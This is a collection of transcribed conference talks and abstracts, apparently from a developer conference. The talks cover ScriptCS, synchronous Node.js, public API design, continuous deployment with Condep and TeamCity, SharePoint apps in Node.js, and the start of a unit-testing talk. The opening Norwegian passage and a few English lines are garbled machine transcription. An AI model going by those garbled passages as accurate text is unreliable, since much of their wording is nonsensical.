køler oppdatering. Og vi kan se hva task eller listet er det atasjtet. Hva er nød til denne type av item? Så når vi går forbundet, vi picker ut en part av appen til å se, vi er tilbake i GUI, og vi vil se at atan-des. Det er atan-des listet i sharepoint. Og dette er det vi har gjort det som det ser ut. Vi er nu oppe i modelen av kodene. Med knockout er vi kanskje fænligere med modelen av kodene. Vi sier at alle modelene er tilbake med de pengerne. Vi vil ikke ha krossependeringer på året, som gjør det er veldig testet. Alle de pengerne skal være inkommeret. Vi er også brukt ut komputerte valgene, så vi kan seppare atan-des, men i denne kjølen kan vi seppare atan-des som ikke er atan-des, som er atan-des, og se dem på en annen måte. Vi har også små funksjoner, og vi kan si at vi vil sette denne kjølen til ikke atan-des, og det vil faktisk søve seg selv. Og hei, det er veldig testet. Vi liker testet kodene, og fra vår seneste projekte har vi brukt BusterJS med to ganger her i Norway, Auguste Løs og Kristian Johansen, som vi finner utvendelig. Vi begynner å se denne ut. Vi begynner å se hvile, og vi har HML. Vi ser skrip-templeter. Denne templeter vi har her er et templet som skriver en person. Her er det mest HML. Vi ser et databind-atribut. Hvem som har vært delt med knockouts og vet databind-atribut? OK, mest av deg. Nogle ting som folk her i NDC har ikke snakket så mye om, er custom binding-handler som du kan gjøre med knockouts. Vi har vært brukt de til å bruke. Det løser til å bind en kvare, som du vet fra før, eller en anden modul, som du kan gjøre med kvare. Så hva du ser her, er det en underligning, det j-kubed-templet. Det er en custom binding-handler vi har, som sier, jeg vil at det er en kvare-templet, og de er de som er kvare. Så når vi forhører denne, og gjør en list og så, det er automatisk å kvare en kvare-templet. Du må ikke ha denne dokumenter, eller event-handler, hver en måde som skriver, og gjør det med kvare-templet, og så er det en måde. Det er ganske kvare. Og dette kan vi reuses i denne HML. Denne HML-blogget er for å se alle alle utlignene, som vi så i før, i blodet. Og her har vi også å bruke en temperatør, som er underligning på skjønnen, som vi bare ser. Og vi kan bare forhøres over denne template over alle er det vi har i vår u-model. Så vi er gammel gammel gammel til å være klar. Og det vi først må gjøre når vi lører et appell, er å kvare alle modeler. Og dette er hvordan vi fire opp hver en av dem. Så vi kvare en, push in the service and user model in this case. Vi kvare update, fordi vi vil fes data. Vi er klar for data nå. Vi vet ikke om det er u-model, men vi vil få data. Og her har vi også en live model som si, at jeg vil løse for at vi kan se på pushserver på atendene, fordi vi kan se på skjønnen, når noe er u-model, og atendene kan fire opp noe fra knockout med socodio, eller noe andre pushserver, eller vi kan se på single R hvis vi er på en styrke Microsoft environment. Og du kan spille på det som du har og du har en live appell. Så vi kvare opp u-model. Vi kvare u-model, og vi oppvier bindings til divnet. Det er det vi ender å få. Hey! Her er vi! Vi fire opp. Og vare på at i kornet her vi har en lille grønning og sier at alle er blevet. For når du bruker å arbeide med sharepoint 2010, du vet at når du klikker en save-button, du er i 10 sekunder og du er i en full roll og når folk her klikker en save-button, de vet ikke at det er en save-button. De tror at det var en slags. Det er veldig viktig å spille dem. Takk for å komme til min talk. Det var min tattel om Enterprise Hips Raps med sharepoint i JavaScript. Jeg håper du har gitt. Takk for at du har gitt.
|
I'll tell the story of the little enterprise app that wanted to be hip. It fled the scary realm of the SharePoint server and moved its code to the browser. The app could talk to SharePoint when it wanted, on its own terms. Finally, it felt it could breathe again and its web devs could throw all their magic spells without fear of retaliation. The application architecture is MVVM. It is built with 9 models and 7 view-models, which means it is large enough to be interesting, while being small enough for demonstrating inner-workings and details. I will discusspros and cons of the architecture, lessons-learned on performance, testing and benefits of using SharePoint as a platform for enterprise apps.
|
10.5446/51456 (DOI)
|
All right. Thanks for coming. My name is Justin Russpatch. I am the author of Compilify.net, an online IDE for C-Sharp. It lets you actually evaluate code from your browser. And together with Glenn Block and Philip Bogeshin, I am a coordinator for the ScriptCS project. So if you're probably like me, you have a folder somewhere on your computer that looks a bit like that, either from console apps that you spun up to explore an idea or a console app that you wrote to schedule as a recurring task or something, for whatever reason, you ended up with a folder that looks like this. Up until now, there really hasn't been a good way to do any of those things without creating a brand new solution in Visual Studio. The problem with creating a new solution in Visual Studio is that you're creating 15 new files every time you go to a new solution, 15 new files in seven different directories on your hard drive. And you're waiting who knows how long for Visual Studio to just open and create the solution for you. So that's one of the reasons that Glenn Block came up with an idea called ScriptCS. And what ScriptCS is a lightweight scripting experience for C-Sharp. It's based on the Roslin compiler and inspired by Node so that you can write simplified C-Sharp in just simple text file with any editor, your favorite editor even. What we do is wrap this Roslin compiler and provide a hostable scripting environment that you can execute from your command line or include in your own application to run C-Sharp script. The C-Sharp script is a little bit different than regular C-Sharp. Roslin goes through a lot of processes to make sure that you don't need to write as much code as you would typically write in a regular C-Sharp application. For instance, name spaces and classes, top level classes, are just optional. You can write them if you want to, but you could also write a top level function, regular C-Sharp statements just in the global scope. We also go a step further and provide some new integration that allows you to reference Nougat packages from your script, install Nougat packages for your script to use, and restore Nougat packages from a packages.config file that Nougat would create for any other solution that you have package restore enabled for. Like I said, this was inspired by Node, so we kind of see a parallel between script C-S being Node and Nougat being kind of at the NPM. Glenn really wanted to create a very parallel experience. He got tired of the Visual Studio, molasses that you have to wade through, when you just want to do simple things. This is going to be a typical example of a script. Like I said, the scripting syntax is a little bit more relaxed than what you would be used to in a regular Visual Studio C-Sharp file. Scripts use a CSX extension for one. And you can see I only have four files in this directory, three of which are code, one of which is the packages config, which lists my dependencies. Instead of the 15 files that I said Visual Studio would create for you, so that right there is a lot less of a headache. There are a few other things that Roslyn adds to C-Sharp that help you get started. And one of them is a load extension, which allows you to reference additional C-Sharp scripts and divide your script or application or whatever into multiple files. Another, which is not shown here, is a pre-processor, just a letter R, is hashtag R. And that allows you to reference assemblies or DLLs that you've already built in Visual Studio. So using this scripting experience, you're able to actually reference things that you might already have laying around. So it really helps with that. As you can see, there are no top level namespaces, no need for classes or anything. What this is doing is actually spinning up a new web API host to listen on port 8080. I'm not sure how many of you are familiar with web API, but it's a simple, self-hosted server that doesn't require IIS. And it just listens on the port that you specify. And it's setting up the default route. It actually goes through a few additional steps that we need to jump through to host web API from a script. We need to write a custom script controller resolver, because web API doesn't pick up controllers and dynamic assemblies. But other than that, it's very standard web API code. We also offer an extensibility point, actually, called script packs. And what they are are new, get distributed assemblies that allow you to kind of set up your environment for your scripts. The goal of ScriptCS is to illuminate as much boilerplate code as possible. To reduce the number of lines you need to write to have a working application as few as possible. Unfortunately, not all the lines that are boilerplate are related directly to C-sharp. We eliminate as much of those as we could with the relaxed scripted syntax. But there's also things related to individual frameworks that are framework specific that you need to wade through. Web API was a great example, because you needed to set up the default routes, which almost never changed. You needed to specify the URL and include additional using statements. So what we did was we created this concept of script packs that allow you to reference additional assemblies for you and add additional using statements and expose functionality in a way that's very similar to the require statement in Node. We expose a global function called require when you call require type of script pack. And it'll add all of these things that you would otherwise need to write. So again, this is the same script that I just showed you. Not using a script pack. But what we did was we set up an example script pack for Web API. And it reduced all the code that we needed to write to that. We took the using statements out. The script pack takes care of that for us. We dropped a bunch of the boilerplate. We don't need to set up the custom controller resolve or any more. The script pack takes care of that for us and registers it with the configuration. And all we need to do is pass in a string to a method called create server. Now you'll see the require method being used there. And the script pack author, what they can do is they decide what's returned by that method. And then any function that they choose to expose on the object that they return, we expose to you. So if they wanted to simplify how you create a server, you can't get much simpler than that for Web API. But if there were some steps that you would need to go through with another framework, you could reduce it to a few helper methods on this object that's returned. So it saves a ton of time. And we're still looking for ways to reduce the number of lines of code that you need to write. But for Web API, it doesn't get much simpler than this. We have already got several script packs being written by several authors of many popular frameworks, including Nancy. We have a WPF script pack, which is very impressive. It allows you to run XAML straight from a regular script. Service stack, Azure Media Services, and Azure Mobile services all have script packs. So how do you get script.cs? What are the steps involved? We install and distribute script.cs through Chocly. I'm not sure how many of you have heard of Chocly, but it is similar to apt-get for Windows. It installs applications through Nougat for your system to use, adds them to your path, and everything. So all you need to do is install Chocly and run the command C install or C script.cs. And we'll pull down the latest version for you from Nougat and throw it in your path. It's actually installed to your app data directory, so it's per user. And it's instantly available for you. Updating is just as simple. You simply run C update, script.cs, and you get the latest version automatically. Glenn had a really genius idea. Script.cs is open source, and we have gotten a ton of community activity since we started. So if you visit us on GitHub, there are a bunch of issues out there. If you have any suggestions, any issues when you're playing with it, we'd love to hear them as soon as possible. And it would definitely help us out. So thank you very much. My name's Justin Rustbatch. And Gait scripts are yours. Thank you. So I'm going to speak about just hacking OJS ugly, worstly, like, you know, ingloriously, to make it run synchronously without doing any fibers or core routines or anything like that. Who am I? I work for Tenjin, among the B. I live in Barcelona, although I'm born here, so I'm Norwegian as well. So why do we want to make Node.js actually behave in a very unglorified, synchronous way? It all started because we have a Mongo shell that comes with the database that's actually JavaScript, right? And that's actually, it used to be SpiderMonkey from Zilla together with a bunch of C++ code. And we changed the V8, like in the last couple of releases, and we started thinking about, like, is it feasible to actually just use Node.js? Because one thing you can do with Node.js is actually you can package up your own custom Node.js distribution as a single binary. But to do that, we kind of had to get around a couple of problems. And the banana code is one of them. The typical Node.js code will look something like this. I mean, as you're writing callbacks, and callbacks, and internal callbacks, you tend to end up in a big, nice banana. And dealing with this isn't really feasible for us, because our shell was synchronous from day one. So you could do something like db.test, test, which is a collection, insert, and do something like that. So I couldn't really do that easily in Node.js. And we needed to be backwards compatible. I can't release like a shell that just doesn't work like this anymore. And to get around that issue, there's a couple of possibilities out there. There's something called Node fibers, which are coroutines. It's using actually threads in the background. It doesn't compile on Windows. It barely works. But it's out there. But it's a hack. It's not actually supported well in the runtime itself. But it's based on the same thing that you know from C Sharp about futures. So you wrap something in a context. And then as long as you're in there, you have the typical wait kind of statements that lets you kind of fire off an asynchronous call and kind of put that coroutine into a sleep mode while something else happens in the event loop and then get back when there's actually some results back. So we wanted something very much simpler and having to avoid wrapping something in a fiber. So another possibility is something that's coming in ECMAScript 6. It's called Generators. And it introduces a concept of the yield keyword and generator functions. And this is kind of a language level feature. Most people who are discovering JavaScript now don't really realize that in probably about a year, there's going to be a massive shift in the way the language works. It's in Node.js under the secret harmony switch, which I can't even spell switch. But if you, for example, download Node.js 11.2 or higher and do slash-sharmony, you suddenly have access to all of these new features that are coming in older browsers sometime in the future. So they will all be in Node.js long before anything else. To play around with it, you run the harmony thing and then you do an npm install, which is the Node package manager of nice little library called Galaxy that will help you basically do it more simply. And code like with basically looks like that. You see this new kind of function declaration with a little star on it. That's a generator. You have a little keyword yield, which basically yields to the system. And then what you're getting is back is actually some sort of iterator. So as long as you're actually doing next, it will process the next kind of statement. And then it returns an object that returns the actual value and if it's done or if it's still executing. So you kind of keep stepping through the function until you actually are done. So it's not quite core routines like you have in C-sharp, but it's close enough. So I decided this wasn't going to work either. So I decided let's do something nasty instead. And let's make blocking calls. And let's make this only feasible for scripting and make it simple. So that means C++. And I'm going to go real quickly through this. But this is what a C++ code for an extension in node looks like. So actually it's a quite nice C++ because the Google guys really did a really good job on the way the whole library works for V8. But to be fairly simple, what we're doing is that we're creating a new function that wraps the function that we're going to call. And then what we're doing is that we're running what we call the event loop in Node.js a step at a time. So think about in your debugger and you run your code one step at a time. We're doing the same thing, but with the actual event loop. So we keep running that until there's actually a result back. And since we are wrapping the function that we want to call with our own function, we can evaluate that function and check if a variable has been set so there's a result back. Once that's done, we return results to the originating caller. So we're not calling back, we're actually just doing a normal return. Everything else that is behind that blocks basically. So what's the usage of this? It's fairly simple. You do a sync, require sync it. And then you take a function in Node.js, like the read directory function. And you do a sync, wrap FS, read there. It gives you back a function. And now you can do like wire.final.ms equals read there and then dot result. If it errors out, you get a dot error as well. So you can check out the actual error that comes back. And that lets you basically just script it simply and do console.log whatever like that. And it still works with another async calls. So if you interleave this with other calls that are doing things against other IO operations, like other IO operations. In this case, we're doing a setTimeout. And then we're basically going down here and we're doing the actual sync operation. You can see from the execution time that we're doing starting a sync block on Timeout, which is like right here. Here we're blocking, waiting for a second. And then we see there a synchronous call actually executes, the one we started up here in between. Because we're single stepping in this event loop, we're still letting other stuff run. And then we finish up and we exit. So what's the problems? UV run is a no-no in any extension. You should never call this. Things that don't work like HTTP parser, for example, is not thread safe. So if you try to do this in a web application and then put some load on it more than a single thread, you're going to like sync fault. So what's the simple? Use it for a script, don't ever use it for a web app. And to install it, just do npm install dash g sync it. And check out my document db talk tomorrow in roommate at 1.40. That's it. Are we college break away? Yeah. Shall I start? Yeah. Hi, everybody. I will be talking about the mindset to develop public API. I will not be showing any code, so it will not be that geeky talk as to previous talks. So I will introduce myself. My name is Kajtse Mostafina, and I'm a developer. I've developed software for 17 years in different companies and countries and roles. And the last six years I worked for Norway Technology Center, SNTC, where we develop software solutions for oil industry. And we develop here in Norway our flagship product called Petrel. And Petrel is a product for helping people find oil. And that is considered to be one of the largest software applications in the world, software packages in the world, and consists of thousands, because there's millions of lines of code, and developed by hundreds of developers. So we have customers all over the planet in Europe, South America, North America, and Asia, and all the continents. So we started developing Petrel here in Norway as an application. And a few years ago we have created an open API for that and made it extensible. And we called it an API Ocean. And that actually today hundreds of developers develop plug-in and extensions to Petrel and use it as a platform to develop their own applications and their own needs for that. And I've been working in Petrel as an application developer for some years. And today I'm working as an Ocean API developer. So I joined the group that has been developing API last year. And what is the difference when you develop an API and then you develop an application? I'll talk in the next few minutes. So API is no different. It is also code. And so all the principles on designing a good code also apply to API. The key difference here that is the API we develop for other developers. So there will be other people and other developers who will use it in their programs to make their own, solve their own needs and write their own programs. And so what are the principles to keep in mind when we develop an API? I will talk in the next few minutes. And the first rule is to keep it simple. And when we design an API, we should think about a simplest user that will use that API to get him started. Is it easy for him to get started? Is it easy for him to just write his first Hello World program? Is it easy for him just to do these needs without going into documentation, without a big learning curve? And if you have some advanced specific user, an expert who wants to write something specific, we should actually think carefully if that scenario fits to this scenario for the simple user. And if it doesn't just go for a special API for that user, because they're already in, they already know what they're talking about, and they don't need, they can invest some time in learning on how easy it is to do. So keeping it simple for simple user is essential in developing API. And we might not think about it when we are developing an application. We think about it to some degree, but an API is really important. What classes you use, how you name them, how you actually use them in applications. And the second issue is the stability promise. So it is a period that people handle much easier their changes in their interfaces, so functionalities than changing the API. For example, if you download an app from the iPhone app store, and I don't know the Spotify recently, and it has totally different interface, but if it is intuitive and if it is easy to understand, people handle it quite easily. If it is a little bit learning, that's fine for people generally, but it's so much different if they have to go and change their code. They have to do some work. Whatever you change in API, you have to actually, you force people to change their code. They might not have resources to do it. They might, they don't want to do it. And the stability promise is much bigger in API development. And we in Ocean have two years stability promise. So we actually declare that we may change things in two years after. That works in paper more or less, but in reality, people are still very much unhappy when they have to change things. So we very often never change it ever. So stability promise is a big deal in API development. Consistency. The frameworks we develop must be consistent. If it is, if one knows part of the framework and the part is used for that, it must, the one must be actually easy to understand the code and easy to guess what this code is doing by knowing the rest of the framework. And this is very important that people can resemble, can understand the code by analogy on that. Doing that, if there is some cool part and if there is some new technology to use, that we would like to use. But it's not consistent with the rest of the framework. We probably have to drop it. And this is unfortunate, but that is, consistency is a big deal when it comes in API development. And the last, but maybe the most important thing is just to use it. Just to make sure you can use it internally before you ship it to others. Because here is stability promise is not there yet. You can't change it still. And find the group that would be using it internally before you ship it. Maybe find someone, if you can't find it just making a workshop or maybe write a set of unit tests that would be used, the documentation to the API is important thing to do it. Because here we can change it. I know working in a project that consumers we have is, they sit next door to us. So we actually ship them new versions every day. So we can change things quickly and we can change things easily before actually stability promise came to change, came to station. We can actually ship it and then we can change it probably never. So we developed that framework based on those principles. And now we have like hundreds of plugins that people download and use and people write the plugins because they, for example, have some confidential property, confidential, intellectual property that they don't want to disclose to us. But they want to use our program as a platform. And today we don't even have a special team that actually develops an API. We actually gave all the teams who develop the functionality. They have to develop their own API and keep these things in mind. Thank you very much. We appreciate everyone in the audience for taking the time and showing us your works at the forum today. I've been davonished that everything onceae, essentially everwhen they button, they see you again. Could I get some tech help? I need mirroring displays. Come on, let's go. Doesn't react. I need mirroring. Can I get some mirroring? I'll try. All right, my name is Jund Telestal. I'll show you how to do continuous deployment in about 10 minutes. Here I say, I'm going to use two things. I'm going to use an open source project called Condep and then TeamCity. This is how you, I recommend you do continuous deployment on Windows. So here I have a simple web application that you've probably all seen before. I'll just try to run it. So you can see what I mean. I need to drag in that browser so you can see it. So this should be familiar to most people on.NET. Where's my arrow? Hello, there it is. All right, and I'm going to deploy this to a server in the cloud, which we also have on a different screen. Let me see. Sorry about this. Here's a server out at Amazon, which now has a default website with no content and has a folder somewhere which doesn't have any content. So I'm just going to create a new project, a new project. Class library, just going to call that deployment. Just renamed that class. We have some name for it. NDC web app. And in order to do Condep stuff, you need to have a library, namely Condep. And here I'm just going to use the beta version. And you get, so I have include pre-lease here. Hopefully I'm on wireless. There it is. Just install that. Post all the dependencies down. And we now have a domain specific language for doing deployment in C sharp. So what I'm going to do with this class is that I'm going to inherit from an abstract class called application artifact. And I'm going to implement a method called configure that sends into objects. I'm going to use the first one that's on local machine that gives me access to this DSL. So I'm going to do a deployment to a server now. So I'm going to say to each server takes an action. You can use that action. And I get out of deploy or execute. I'm going to deploy. And I'm going to deploy an IS web application. To just make this a bit quicker, I'm just going to copy some code. And I'm just going to explain what that is. So here I have a source directory that tells me where is the source for the application that we're going to deploy. Sorry? Yep. No worries. Is that enough? And the destination directory where the application is going to end up on a server. The web application name, which is the name in IS for the application. And the website which it should belong to. So that's the only two things I need. That's the only thing I need to define in order to deploy an IS application. But I only tell or define through the DSL what I'm going to do, not where I'm going to do it. So I need to add a configuration file. So I'm just going to add an existing one to make it a bit quicker. And this has the extension dev.end.json. So this is a configuration file for the dev environment. If I want to have something for test environment as well, it would typically be test.end.json. I'm just going to make sure that this is being copied when I built. So just do like that. And here I tell a condom which servers I'm going to deploy to. There's just one server, but it can be as many as you want. And which user are you going to use to authenticate with towards that server. We have a password in clear text, but that's going to be fixed. We need to encrypt that. But right now it's in clear text. So I'm just going to build this to see that it works. And then bring up my browser again. Not that one. So here's TeamCity. I've defined a project to build the web application to standard. The only difference between this one and the regular one would be that I've defined... I don't know if you can see this, but I've defined where the content of the build output for that project ending up in a build ship, which is the artifact for the build. I'm just going to make this a bit bigger. No? Okay. And then we need a separate project in TeamCity for actually doing the deployment. Just to make it easy, I'm just going to do this. I have a project here. I'm just going to walk quickly through the settings for this project. Actually, before that, I'll need to show you just a folder. So when I did build earlier... Fantastic. That ended up in the deployment project in a bin folder. You see that I have the DLL for my deployment project, but also a CondepXC, which was pulled in when I added the NuGet packages. This is the one we're going to use in order to actually execute the deployment. So just give the project a name. There's no version control settings because it just depends on the previous build. Define a command line, which is just a name for Condep.XC, the XC file that does the deployment. And you tell it which DLL does it find the deployment definition in. And then you point to the environment that you're going to use. And then you just use convention to figure out, well, dev.n.json is the JSON file I'm going to use to find the environment settings. And then the name of the class that we defined as the definition, which is the one we saw here, right? So that's it. So what we can do then is... So I basically now set up... Well, actually, there's one more thing. That's how you define the deployment. And then you want to have a continuous deployment. So add a trigger to say that, well, whenever the previous build project is successful, this one is going to kick off. And then you set up a few dependencies. Say I have a snapshot dependency on a previous project and an artifact dependency on the build zip file. And I just unzip that into a folder so I can use those files during execution. And that means that we now can go into Visual Studio and make a change to this project. Let's say we're going to do... Change the name here and just say something like that. Just to make a change. And I'm going to check that in to GitHub. Ups. Like that. Pissed us to GitHub. I mean, you can use whatever source control system you want connected to your CI. And if we go out here, CI should kick off this process. So I'm just going to help them a bit. So trigger it. And as soon as that's finished, it's going to automatically trigger the next one, which is the deployment. By the way, if you want to know more about Condep, I have a talk on this tomorrow at 1340. So drop by if you want to know more. And then suddenly this one's going to kick off. Usually takes a bit of time. Come on, you can do it. There it is. That kicks off. Look at the build log, what's going on. Executes Condep. Condep starts doing stuff on that. Promotes server in the cloud. I can't really much say about the details here now. I'll talk more about that tomorrow. If we go to the server and have a look at this folder, it should show up very soon a folder here called Web Apps that contain the application that is going to deploy. So it's just about to do the deployment now. So in 10 seconds. So that's Web Apps. And it's also a Web App. And if you look at the website, it's the website's there. And if we go to this one, do refresh. It's getting displayed. So that's how you do the continuous deployment. Hello, everyone. This is my first public appearance as a clown. By the looks I'm getting when I'm wandering, walking around the halls. It might be my last. We'll see. So I'm Bjorn Einar Bjartnes, developer in Kompitas. But today I'm here as the enterprise clown, my alter ego. And I just have to give a little bit of warning. There might be some rants in here. We'll see. So at some point, Bjorn, he took the red pill and he saw what was outside the enterprise world. And he saw what the cool kids were doing on GitHub. And he saw how lean software they built. He saw that with his own eyes. And he learned that the true battle is not the battle between Eclipse and Visual Studio. It's between Wim and Emax. He learned about the history of our industry, of which little is spoken in the enterprise. And his eyes seeing clearer every day, the way of the enterprise makes Bjorn really sad. And to stay sane, he sometimes lets his inner enterprise clown out as today. And the clown does stuff that does not really belong in the enterprise, but cunningly disguised as a clown, he gets away with it. And sometimes he even manages to put a smile on the depressed Bjorn's face. And the clown helps Bjorn stay sane while he dreams of better days for our industry. So the blue pill represents enterprise software of today, whereas the red pill represents what's out there, what's out there on the Internet. So I figured, let's eat the red and the blue pill and go on this purple trip. It might expand our consciousness. Let's build SharePoint apps in Node.js. So not to be too abstract. I'm just going to show you what we did at Hackathon, me and some friends. I'll have their names later. It was the Arctic SharePoint Challenge earlier this year. And so what we're seeing here is this multi-user real-time application on SharePoint. So you see we're using leap motion to drag and drop these tasks. You can control priority and completeness date and you can add new tasks. And you see how they're synchronized with the iPhone and the iPad using WebSockets across Atlantic in real time. It's not your typical SharePoint application, right? So Node.js has been mentioned before. The key thing I wanted to think of here, drop that JavaScript runtime thing, but it's a platform that's built to do scalable network applications. I'll come back to that. You're talking about SharePoint apps, right? Why are you suddenly talking about distributed network applications? We'll come back to that. That's really all we need to know. And the other part about leanness. And the NPM part was mentioned before, so I don't really have to go into that. But that's really core here, that we have like this really simple understandable core and you can pull in modules and build on those modules. And the Hipstru factory is also pretty good on Node.js. It's starting to fade off. I think it's close to Erlang and close to Closure, almost there. So that's a plus as well. Whereas this guy, SharePoint, has a Hipstru factory like Near Zero, maybe negative. And it's this big enterprise monolithic product. And we're doing this IDE driven development by Wizards. So we have this Wizards that leads us through and pretends to help us. And the cool thing about SharePoint though is that in 2013, Microsoft opened it up. They created their API. They call it a REST API. It's pretty REST, part of it is RESTful anyway, which allows you to connect with whatever web technology you like. So since I don't know Erlang, I've tried to do something with Node.js on it. So we all know this guy, right? He's a powerful wizard. He's a very good wizard. He helps you do stuff. He helps good people do good stuff. Then we have this wizard. He's an evil wizard. He blurs your vision. So you hardly can see what's going on. And I'm thinking, I'm trying as hard as I can, and I guess a lot of you are as well, to be good programmers. And then we get this Joe Sixpack IDE that Microsoft thinks is going to help us to build better stuff. This is their idea of DevOps, right? That you're supposed to choose your dev environment by a drop-down list, and press F5 and everything is going to be okay. Either they've solved DevOps with a drop-down, or it's the major leak abstraction that is going to ruin your project when you're going live. You might work for one guy and one machine doing dev stuff. If you're lucky, it's going to work in one instance when you deploy it. I'm not going to go into detail on this part. This just shows what you have to start to do manually when you're building a SharePoint app. You have the client. You have your SharePoint application here. You have SharePoint itself. And you have the Azure ACS, which gives you does all authorization and authentication and all of that stuff. So there's a lot of tokens flying around here that you need to understand in order to build this if you're doing it from scratch. All of this stuff, the wizard wants to hide from you, but sooner or later, you need to understand this anyway. So this is the architecture of a SharePoint, typical SharePoint application. So you have this is your SharePoint instance in the cloud. So these are all your clients that are connecting to SharePoint. Then you have ACS, that does the authorization part. Then you have your application. In my case, it was Node.js running on Node.jitsu just to really show it's decoupled. I'm building on Linux. I'm deploying on Linux and running on Node.jitsu. So it could have been Azure, but I'm trying to stay all enterprise clowny. You need to do it on non-Microsoft technology. And you might be using some Azure backend services as well. And this is where these distributed network applications come into play. Because in a real-time app, you have secure web sockets. You have HTTPS to multiple clients. Clients can talk directly to SharePoint, and SharePoint will talk. So everybody's talking to everyone here. And this is where this Node.js event loop model fits really well in. Not if you do it synchronously as shown before, but if you let Node do its job normally. So again, just a screenshot from how you can deploy stuff when you're running and building on a proper operating system. You have a proper shell that can deploy. You see the package, and you can run commands to deploy it wherever you want. And you have full control of what's going on, which is very, very nice if you're building applications that are supposed to work. So I'm going to a little bit more just to show you an example of how this looks like. So you see now we're on ByardWolf SharePoint.com. So this is a SharePoint instance in the cloud. And I can launch my application. So I'll launch my application, and all this authorization dance is going on. And we're on Node.jitsu. And we have cute cats on tasks. And you see, this looks very much like SharePoint. You can pull in all the Chrome. Everything is web-buried. I mean, you can do this. You would think this is a typical SharePoint application, but it's running on Node. So you can create new tasks. And when you create something, it's sent to SharePoint. And when you just drag stuff around for the real-time stuff, SharePoint doesn't even know about it. Your application is just relaying this to all authenticated clients. So we can go back to SharePoint to see our task is back here, and we can add that to the task list. So what do we get? We get this lightweight application, which is cheap to host. It's cheap to scale. It's possible to understand, which is very good. And you can leverage all these cool NPM modules. I want to give a few shout-outs to MacRotter at Qport. He made this passport strategy for Node. I stole everything from him. I'll scale your NARA, and I'd love if you're helping me build this thing in the Hackathon. Here's the code if you're interested. This code is Hackathon code. I wouldn't use it for anything serious. And if you're into building cool apps on SharePoint, but more for real, not as a clown, I would really recommend this next talk in Room 1 on building enterprise IPs to apps with SharePoint and JavaScript. So all I can say, dare to wear the foolish clown face, go out, experiment, have fun, enjoy the rest of the conference. Thanks. Thank you.
|
Talk 1: ScriptCS - Justin Rusbatch Talk 2: Making node.js behave synchronously - Christian Amor Kvalheim Talk 3: From program to platform: mindset to develop public API - Katya Mustafina Talk 4: Enable Continuous Delivery for your Web/Server apps in 10 min - Jon Arild Tørresdal Talk 5: The Enterprise Clown builds SP2013 apps with node.js - Bjørn Einar Bjartnes
|
10.5446/51457 (DOI)
|
Hi. Before we start, I wanted to ask a question. Who is writing unit tests? Super. Many people write unit tests. We will use C-sharp. Many people use C-sharp. Java. C++. Because two people, three people. Right. So, did you ever have a problem maintaining your tests and trying to read it and not understand it? Have you ever spent hours in understanding the test? Did anyone have this problem? Yeah, a few people. So, we'll talk about that. About how we can write the test that is easy to maintain. That it's easy to work with later on. My name is Kaisa Mostafina. I'm a developer. I developed software for about 17 years in different companies in countries. I worked for six years in the Norway Technology Center. Which is part of the biggest company that produces oil services. We produce software solutions for the oil industry. The flagship product we produce here in Norway is called Petrel. Petrel is a software that helps people find oil. That is a tool for surface modeling. If you're an oil industry, you can do with Petrel basically whatever you want. The coolest feature of Petrel is 3D visualization. That's why I have this cool picture on that slide. That is considered to be one of the largest of the packages in the world. It has hundreds, developed by hundreds of developers and millions of lines of code. This is a successful product that is being sold in all the continents. The key component of that success is automated testing. We have starting developing Petrel in 1995 here in Norway when TDD wasn't really around. We had to adapt to it. We had to start using it at some point. We have gone all the long way from total hate to total love. I will try to connect the good practices of writing a unit test to our experiences and to what worked and what didn't work for us. TDD, unit testing, it became a religious issue. Everybody is talking about it. Some people believe it. Some people are deep fanatics. Some people follow it to some degree. There are some people who don't think we don't need it. There are still some people like that. But generally, as a programming community, we have adapted to unit testing. We are all committed to spend some time to write tests for our software. That's generally happened because people tried it and saw the value of it. They realized there is a benefit for us. We started spending less time on bug fixing, less time on testing. Bug fixing has now been our favorite activity. So we recognize the value of it. We really like that. That is a value that we all share these days. Like 10 years ago, it would be normal to talk to someone and realize, okay, they don't have an automated test at all. They don't have automated tests. Today, it's nearly impossible to have that kind of conversation. I think everybody raised their hands when I asked people to write the test. I had this kind of talk recently with some peers who don't have unit tests. But that's actually immediately smells. They spend a lot of time bug fixing. They spend a lot of time testing. It's probably not that exciting on what they are doing on an everyday basis. So, and we have done a great job in using tests as our helpers. And this talk will be very much about there is more than we can do about that. Better quality with the less effort. And let's outline our problem statement here. So we are using automated tests and our safety net. Well spotted by Martin Fowler some years back who invented that acronym. So it's so easy to refactor. It's so easy to change the code that we have a test for. So we can easily detect the problem. And that is all very good. But then we write more code and more tests. And more code and more tests. And there are several releases we have gone through with this test. And sometimes they start failing. We have to go back to them. We have to understand what is happening. And that brings us to maintenance problems. If you cannot easily detect what is happening with the test, if readability is bad, then we spend a lot of time on that. And I spoke to some colleagues some years back and they just started scramming their team. And that iterative development actually made it very visible of what they are doing immediately. And they were complaining like we spend an iteration just fixing the unit test. And next iteration we spend just fixing the unit test. We are not doing anything good. We are just fixing the unit test. And that is the situation that we want to avoid. We don't want our safety net to bring us to this. We don't want that. We want to spend less time on maintaining our test base. We want to make it easy. And at the end we are not paid to do tests. If we could ship the software without the testing machine, that's fine. And no one would ask us where do you have automated test suite. That would be fine. But this is our own internal tool to do that. So let's talk about what makes this hard to maintain. What we can do to make things easy to maintain. And here brings us to the question what is a good test. And looking at the good test, what we can think about. Can we think about how it looks? Can we think about what a test which is coverage? Can we think about coverage? And we talk about coverage all the time. It's our main metric of the quality. But generally should we think about coverage or should we think about other things? Should we think about when we run our tests? Do we run them all in the same time? Or should we probably run some integration tests afterwards? Or where we test? Which part of code we choose to test? Or we should blindly follow the coverage and gain for the coverage. We'll talk about in a minute. And the first thing I wanted to talk about is readability. We'll talk about how it tests. Anyone had that situation? Some people had. Right. And why we care about readability at all? That is not a production code. And the thing is that we want our test to fail at some time in the future. Anyone had a situation when someone told, okay, I had written that test and that was so good because it saved me so much time afterwards. Unfortunately, we cannot predict it. But we actually want them to fail sometime in the future. And when it fails, someone needs to go and understand why it fails. What happened, actually? And we want to minimize that effort because at this point we are doing something else. We are developing software that is not related to maybe what this test is doing and that part of software that we have written. So when we do that, it's ‑‑ if you have to spend a lot of time actually understanding and maintaining the test, that is a pain for us. We don't want that context switch. We want to continue to do it. We want this to be a light activity to go and understand the test. That is because of that and then fix it and then go on. And I really like the Roy O'Sheriff phrase that he wrote in his book who said that readability is the connecting thread between the one who wrote the test and the poor soul who will read it a few months later. Tests are stories that we tell the next generation of programmers in the project. And that is so true. We want to tell that story and we will tell a good story. So let's look at the part that would actually help us to reach ‑‑ to achieve readability. How can we get there to write a good readable test? And let's look at the part that is called a range actor. Anyone is using that part when writing their tests? Yeah, a few people. And that has been blocked I 